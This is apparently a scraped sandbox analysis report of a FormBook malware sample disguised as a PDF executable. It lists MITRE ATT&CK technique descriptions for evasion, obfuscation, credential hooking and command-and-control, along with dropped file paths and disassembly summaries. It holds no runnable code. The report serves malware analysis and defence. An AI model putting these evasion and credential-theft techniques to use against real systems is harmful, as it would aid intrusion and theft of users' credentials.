Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report E-DEKONT_pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsvA708.tmp\System.dll

C:\Users\user\AppData\Roaming\DORME.ini

C:\Users\user\procharity\Anasarca\Uncompelled\Amatrarkolog217.Taf

C:\Users\user\procharity\Anasarca\Uncompelled\Bendixs\Bavnene24\Punkerne\Zaffer\mail-mark-junk-symbolic.symbolic.png

C:\Users\user\procharity\Anasarca\Uncompelled\Bendixs\Bavnene24\Punkerne\Zaffer\nn.txt

C:\Users\user\procharity\Anasarca\Uncompelled\Bendixs\Bavnene24\Punkerne\Zaffer\object-flip-vertical-symbolic.svg

C:\Users\user\procharity\Anasarca\Uncompelled\Bendixs\Bavnene24\Punkerne\Zaffer\orientation-portrait-right-symbolic.svg

C:\Users\user\procharity\Anasarca\Uncompelled\Bendixs\Bavnene24\Punkerne\Zaffer\schema-639-5.json

C:\Users\user\procharity\Anasarca\Uncompelled\Bendixs\Bavnene24\Punkerne\Zaffer\video-display-symbolic.svg

C:\Users\user\procharity\Anasarca\Uncompelled\EBCDIC.map

C:\Users\user\procharity\Anasarca\Uncompelled\Injured\Velmagtsdagene.Fra

C:\Users\user\procharity\Anasarca\Uncompelled\Mors\edit-delete-symbolic.symbolic.png

C:\Users\user\procharity\Anasarca\Uncompelled\Mors\format-justify-right.png

C:\Users\user\procharity\Anasarca\Uncompelled\Mors\format-text-strikethrough-symbolic.symbolic.png

C:\Users\user\procharity\Anasarca\Uncompelled\Redaktionschefen\Billedsider\Aggersunds\Eclogue\Green_Leaves_11.bmp

Windows Analysis Report
E-DEKONT_pdf.exe

Function 00403390 Relevance: 84.4, APIs: 33, Strings: 15, Instructions: 417
stringfilecomCOMMON

Function 6EC92288 Relevance: 25.2, APIs: 13, Strings: 1, Instructions: 667
stringlibrarymemoryCOMMONCrypto

Function 004059F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159
filestringCOMMON

Function 004065AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 00405DC7 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 00403DB7 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357
windowstringCOMMON

Function 00403A1A Relevance: 40.5, APIs: 14, Strings: 9, Instructions: 215
stringregistryCOMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre